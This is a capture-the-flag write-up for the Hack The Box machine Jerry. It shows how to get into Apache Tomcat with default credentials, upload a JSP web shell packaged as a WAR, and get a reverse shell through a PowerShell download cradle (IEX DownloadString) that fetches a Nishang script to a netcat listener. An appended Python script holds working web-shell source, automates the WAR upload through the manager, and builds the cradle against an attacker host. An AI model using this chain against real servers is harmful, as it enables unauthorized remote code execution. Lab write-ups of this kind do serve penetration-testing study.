HTB (Jerry) Write-Up, No Metasploit

A quick write-up of Jerry from HTB.

nmap -sC -sV

shows Apache Tomcat on port 8080.


Go there and check it out. The Server Status link asks for a password, and admin:admin works. Nothing too crazy there, so try the Manager App link next.


admin:admin doesn't work for the manager. The 403 page Tomcat returns includes an example tomcat-users.xml entry, which gives away the default tomcat:s3cret. The browser keeps re-sending the cached admin:admin credentials, so clear your cache (or use a private window) and tomcat:s3cret works. The manager login could also be brute-forced with hydra; SecLists on GitHub has a wordlist of Tomcat default credentials.


If you scroll down you see that you can upload WAR files. Kali ships with web shells in /usr/share/webshells/ that you could try, but I just googled for a JSP shell, clicked Raw, and ran

curl <raw URL of the JSP shell> > cmd.jsp

to download it. The manager only accepts WAR files, and a WAR is just a zip archive, so run this in bash:

zip cmd.war cmd.jsp

Upload the file, then browse to http://server:8080/cmd/cmd.jsp

and you should see the shell's page.


whoami shows you have code execution as SYSTEM, nice. The same manager page that accepts WAR uploads also reports the OS architecture, and this machine is 64-bit,


so you want to run 64-bit PowerShell. Googling the 64-bit PowerShell path gives C:\Windows\System32\WindowsPowerShell\v1.0\. Get Nishang if you don't already have it (git clone https://github.com/samratashok/nishang) and use Invoke-PowerShellTcp.ps1 from the Shells directory. Edit the script so that it calls the function at the bottom with your IP and the port you are going to listen on with netcat, for example Invoke-PowerShellTcp -Reverse -IPAddress <your IP> -Port 9000.


Serve the script with a Python HTTP server (I renamed the PS script to shell):

python3 -m http.server 80

Set up a netcat listener on the port you specified in the PowerShell script:

nc -lvnp 9000

Run the following command through the JSP shell (the URL of your hosted script goes inside the quotes; it is left blank here):

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).downloadString('')

This launches 64-bit PowerShell and runs a one-line download cradle: it fetches the script over HTTP, loads the function it defines into memory, and runs the call you appended at the bottom. Nothing touches disk on the target.


After the command runs you should also see a GET request for the script on your Python web server, and finally a shell on your netcat listener.
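The whole chain above (package a JSP shell as a WAR, push it through the Tomcat manager, build the 64-bit PowerShell cradle) can be scripted so you are not fighting the browser's cached credentials. The block below is an added example written for this write-up, not code from the original post or from Nishang. It assumes the standard Tomcat HTML manager, where the upload form posts to /manager/html/upload with a CSRF nonce taken from the manager page; the JSP shell source, the base URL, the credentials (tomcat:s3cret, as found above) and the attacker host/port are constructed placeholders.

```python
"""Package a JSP command shell as a WAR and deploy it via the Tomcat HTML manager."""
import base64
import io
import re
import urllib.request
import uuid
import zipfile

# Minimal JSP command shell, constructed for this example (not the one the
# write-up downloaded). Runs ?cmd=... via Runtime.exec and echoes stdout.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

# 64-bit PowerShell path from the write-up.
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def build_war(jsp_name="cmd.jsp", jsp_source=CMD_JSP):
    """Same as `zip cmd.war cmd.jsp`: a WAR is a zip, and Tomcat serves a bare
    JSP at /<war name>/<jsp_name> without any WEB-INF/web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the entries in a WAR, for a sanity check before uploading."""
    return zipfile.ZipFile(io.BytesIO(war_bytes)).namelist()


def basic_auth(user, password):
    """Explicit Authorization header, so no browser cache can swap in admin:admin."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def extract_nonce(manager_html):
    """The manager's upload form URL carries a CSRF nonce; reuse it or the POST is rejected."""
    m = re.search(r"org\.apache\.catalina\.filters\.CSRF_NONCE=([0-9A-Fa-f]+)", manager_html)
    return m.group(1) if m else None


def multipart(field, filename, data, boundary):
    """Hand-rolled multipart/form-data body (the stdlib has no encoder)."""
    head = (f"--{boundary}\r\nContent-Disposition: form-data; name=\"{field}\"; "
            f"filename=\"{filename}\"\r\nContent-Type: application/octet-stream\r\n\r\n")
    return head.encode() + data + f"\r\n--{boundary}--\r\n".encode()


def deploy_war(base_url, user, password, war_bytes, war_name="cmd.war"):
    """Deploy through /manager/html/upload, which only needs the manager-gui role.
    Returns the HTTP status of the upload (network call; not exercised offline)."""
    auth = basic_auth(user, password)
    page = urllib.request.urlopen(
        urllib.request.Request(f"{base_url}/manager/html", headers=auth)).read().decode(errors="replace")
    nonce = extract_nonce(page)
    if nonce is None:
        raise RuntimeError("no CSRF nonce on manager page: wrong credentials or missing manager-gui role")
    boundary = uuid.uuid4().hex
    req = urllib.request.Request(
        f"{base_url}/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE={nonce}",
        data=multipart("deployWar", war_name, war_bytes, boundary), method="POST",
        headers={**auth, "Content-Type": f"multipart/form-data; boundary={boundary}"})
    return urllib.request.urlopen(req).status


def cradle(attacker_host, attacker_port, script="shell.ps1"):
    """The 64-bit PowerShell download cradle to paste into the JSP shell."""
    return (f"{PS64} IEX (New-Object Net.WebClient)"
            f".DownloadString('http://{attacker_host}:{attacker_port}/{script}')")


if __name__ == "__main__":
    war = build_war()
    print("WAR entries:", war_entries(war))
    # Placeholders: replace with the target and your own listener before running.
    # print(deploy_war("http://TARGET:8080", "tomcat", "s3cret", war))
    print(cradle("ATTACKER_IP", 80))
```

After deploy_war returns 200 the shell is at /cmd/cmd.jsp?cmd=whoami; paste the cradle() output as the cmd parameter once the Python web server and netcat listener are up.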



And that's it!